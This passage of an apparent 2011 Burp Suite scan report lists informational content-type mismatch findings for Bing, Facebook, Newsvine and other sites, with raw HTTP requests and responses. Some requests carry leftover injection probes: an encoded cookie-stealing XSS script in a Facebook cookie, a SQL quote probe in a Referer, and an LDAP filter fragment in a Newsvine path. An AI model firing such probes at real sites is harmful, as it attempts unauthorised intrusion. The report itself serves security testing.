Set-Cookie: _SS=SID=C42C62E80354428984A0B25122A137A1; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:20 GMT; domain=.bing.com; path=/

Ref A: 2356F9C5F52D438CAB518EA2D215DC2D Ref B: F9E018AA659B2CF02D557CF10072F817 Ref C: Sat Jan 29 15:53:20 2011
PST

34.89. http://www.bing.com/travel/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/travel/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:59 GMT
Connection: close
Set-Cookie: _SS=SID=6091FAEBF64A421B858A5F3BFDBD054C; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:59 GMT; domain=.bing.com; path=/

Ref A: F5C8CCEB162144C591857AB9E14F1760 Ref B: EDE90AA1BDD0FCA4CA6C0156B9267B78 Ref C: Sat Jan 29 15:52:59 2011
PST

34.90. http://www.bing.com/travel/content/search previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/travel/content/search

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:00 GMT
Connection: close
Set-Cookie: _SS=SID=4A19CEB3D764484EAC22E549B296859E; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:00 GMT; domain=.bing.com; path=/

Ref A: C1333EA8AE1944F9A0830AC35E7CBBED Ref B: F223F3A6ABA5B3E28BB1A762FC73FA2F Ref C: Sat Jan 29 15:53:00 2011
PST

34.91. http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/travel/deals/cheap-flights-to-the-caribbean.do

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:01 GMT
Connection: close
Set-Cookie: _SS=SID=5145343C6A314699A805392591398E29; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:01 GMT; domain=.bing.com; path=/

Ref A: CA30FCAAD9E84C74BE6018CB1CEBBCAF Ref B: 2B2C12697EE00036CE2B7CA4CFFC3D75 Ref C: Sat Jan 29 15:53:01 2011
PST

34.92. http://www.bing.com/travel/deals/last-minute-flight-deals.do previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/travel/deals/last-minute-flight-deals.do

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:03 GMT
Connection: close
Set-Cookie: _SS=SID=C16866E6F1A44DF887970AC15A109589; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:03 GMT; domain=.bing.com; path=/

Ref A: 2543A6AD547E4B5F88CAF1F4B990F00A Ref B: 3A793CF2861BA22FABD77094EB0904DE Ref C: Sat Jan 29 15:53:03 2011
PST

34.93. http://www.bing.com/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:03 GMT
Connection: close
Set-Cookie: _SS=SID=DF4AEC402932490192415C046FCE0D03; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:03 GMT; domain=.bing.com; path=/

Ref A: 22A32A2A68354A09B360D2992262AABF Ref B: 33A52F487F682CE81DF860C8B90E62C4 Ref C: Sat Jan 29 15:53:03 2011
PST

34.94. http://www.bing.com/videos/services/user/info previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/videos/services/user/info

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /videos/services/user/info?callback=jsonp1296407516784&responseEncoding=json HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/browse
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: text/javascript, application/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _SS=SID=4318D78D50E640FC90E674B1FECFA468&hIm=178; RMS=F=O; MUID=DC63BAA44C3843F38378B4BB213E0A6F; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; SRCHD=SM=1&MS=1621031&D=1593447&AF=NOFORM; _FP=BDCE=129409675061634862&BDCEH=4B00CE098126B4CE6DFFB8D547F7B893; _UR=OMW=0; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 165
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 17:11:59 GMT
Connection: close

jsonp1296407516784({"user":{"country":{"name":{"$":'us'},"flags":{"$":'40000000'},"$":null},"market":{"name":{"$":'en-us'},"enabled":{"$":'True'},"$":null},"$":""}})

34.95. http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:48 GMT
Connection: close
Set-Cookie: _SS=SID=96515E70C1394D22AE9809D980A4559B; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:48 GMT; domain=.bing.com; path=/

Ref A: 064950FD5BA64B248B41CFFBAE5C4771 Ref B: AFAF33903714AC5B6D764143C29EA2A4 Ref C: Sat Jan 29 15:52:48 2011
PST

34.96. http://www.bing.com/videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:43 GMT
Connection: close
Set-Cookie: _SS=SID=24874BCFBCB44B8B85CBC2902237BB66; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:43 GMT; domain=.bing.com; path=/

Ref A: AAD1B8D4086344DAA11FB6781C52DF5D Ref B: F6A08B0C3BC2B3B37340133B5CB10F06 Ref C: Sat Jan 29 15:52:43 2011
PST

34.97. http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:48 GMT
Connection: close
Set-Cookie: _SS=SID=C1449677CB9D4A6CA3BAE7B9A7C13450; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:48 GMT; domain=.bing.com; path=/

Ref A: 014881C8B97D404988E2C53F6F54BE0B Ref B: B8DDD36B11B4F2ABEB77E7FA5CC7288A Ref C: Sat Jan 29 15:52:48 2011
PST

34.98. http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:44 GMT
Connection: close
Set-Cookie: _SS=SID=F5CECEC5DAB34C3DB68586F5B7502AC3; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:44 GMT; domain=.bing.com; path=/

Ref A: AAB024B4D5FE4F2798F83EB8EAC8D0C7 Ref B: 4B8191579F9751ED83CBE2C2B9D111CC Ref C: Sat Jan 29 15:52:44 2011
PST

34.99. http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bing.com
Path:	/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:51 GMT
Connection: close
Set-Cookie: _SS=SID=042186D5ACA443269CD8645BC53318FB; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:50 GMT; domain=.bing.com; path=/

Ref A: A79783D4834F4DFE80D0EC922059FE12 Ref B: 9DBF36B561C1B7930109FA7DE5C95BEC Ref C: Sat Jan 29 15:52:50 2011
PST

34.100. http://www.co2stats.com/propres.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.co2stats.com
Path:	/propres.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

34.101. http://www.codeplex.com/site/analyticsid.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.codeplex.com
Path:	/site/analyticsid.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /site/analyticsid.aspx HTTP/1.1
Host: www.codeplex.com
Proxy-Connection: keep-alive
Referer: http://silverlight.codeplex.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=aa53c1dyzeonloxydyax0t0n

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 12:49:41 GMT
Content-Length: 69

34.102. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /extern/login_status.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 01:22:22 GMT
Content-Length: 22

Invalid Application ID

34.103. http://www.hoovers.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.hoovers.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

Response

34.104. http://www.kanoodle.com/ajax/search_spy_data.html previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.kanoodle.com
Path:	/ajax/search_spy_data.html

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

34.105. http://www.kanoodle.com/ajax/search_spy_data_today.html previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.kanoodle.com
Path:	/ajax/search_spy_data_today.html

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:53:32 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:32 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 765

&title=Top+Searches+-+History,{font-size: 16px; color: #003399}&
&x_legend=Term,14,#003399&
&x_label_style=9,#003399,2&
&x_axis_steps=1&
&y_legend=Percent,14,#003399&
&y_ticks=5,10,3&
&bar=100,#
...[SNIP]...

34.106. http://www.kanoodle.com/images/kanoodle-lightbulb-home.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.kanoodle.com
Path:	/images/kanoodle-lightbulb-home.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /images/kanoodle-lightbulb-home.gif HTTP/1.1
Host: www.kanoodle.com
Proxy-Connection: keep-alive
Referer: http://www.kanoodle.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:53:25 GMT
Server: Apache
Last-Modified: Wed, 26 Jan 2011 21:55:06 GMT
ETag: "16838b-16ad-e2cb0280"
Accept-Ranges: bytes
Content-Length: 5805
Connection: close
Content-Type: image/gif

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . ........................................................a....
...[SNIP]...

34.107. http://www.newsvine.com/_action/article/emailThis previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.newsvine.com
Path:	/_action/article/emailThis

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /_action/article/emailThis HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

34.108. http://www.newsvine.com/_action/user/startTracking previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.newsvine.com
Path:	/_action/user/startTracking

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /_action/user/startTracking HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

34.109. http://www.newsvine.com/_action/user/stopTracking previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.newsvine.com
Path:	/_action/user/stopTracking

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /_action/user/stopTracking HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

34.110. http://www.newsvine.com/_vine/m2 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.newsvine.com
Path:	/_vine/m2

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

POST /_vine/m2 HTTP/1.1
Host: www.newsvine.com
Proxy-Connection: keep-alive
Referer: http://www.newsvine.com/
Origin: http://www.newsvine.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; vid=55d515b4f7dadf9aee6395750020b187; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296399959031
Content-Length: 104

call=streamData&moduleId=27&usedContent=5935834,5953356,5953653,5953656,5953706,5953816,5953817,5953818,

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 15:03:59 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: Keep-Alive
Content-Length: 14168

[{"url":"\/_action\/article\/mediaArticle?mediaContentId=5951930","src":"http:\/\/www.polls.newsvine.com\/_vine\/images\/ap\/nws\/4cc5b54e-813b-4b64-a004-91823baaa2a9.jpg","width":"380","height":"280"
...[SNIP]...

34.111. http://www.newsvine.com/_vine/printer previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.newsvine.com
Path:	/_vine/printer

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /_vine/printer?call=streamSessionObjects&sectionDomain=www&path=/ HTTP/1.1
Host: www.newsvine.com
Proxy-Connection: keep-alive
Referer: http://www.newsvine.com/
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; vid=55d515b4f7dadf9aee6395750020b187; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 15:03:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Length: 435
Content-Type: text/html; charset=UTF-8

{"cpk":{"version":"23247"},"conf":{"matchPath":"\/_login\/proxy?path=","mediaRoot":"http:\/\/www.polls.newsvine.com","useHTTPS":true,"bootstrapRoot":"\/_nv","vineRoot":"http:\/\/www.newsvine.com\/_vin
...[SNIP]...

34.112. http://www.polls.newsvine.com/_vine/printer previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.polls.newsvine.com
Path:	/_vine/printer

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /_vine/printer?call=streamSessionObjects&sectionDomain=www&path=/_vine/3c3db971ca91afcd)(sn=*/pierre HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://www.polls.newsvine.com/_vine/3c3db971ca91afcd)(sn=*/pierre
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:24:17 GMT
Connection: close
Content-Length: 479

{"cpk":{"version":"23247"},"conf":{"matchPath":"\/_login\/proxy?path=","mediaRoot":"http:\/\/www.polls.newsvine.com","useHTTPS":true,"bootstrapRoot":"\/_nv","vineRoot":"http:\/\/www.polls.newsvine.com
...[SNIP]...

34.113. http://www.reimage.com/images/reimage.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.reimage.com
Path:	/images/reimage.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /images/reimage.ico HTTP/1.1
Host: www.reimage.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tr00qdoq010dhkbjc6ke2ogs54; _language=english; _tracking=Neudesic69f18; _campaign=direct; _adgroup=direct; _keyword=direct; _ads=direct; _visit=1; _trackid=12484382; _visitnum=1; __utmz=243771526.1296350627.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/9; __utma=243771526.235665945.1296350627.1296350627.1296350627.1; __utmc=243771526; __utmb=243771526.2.10.1296350627

Response

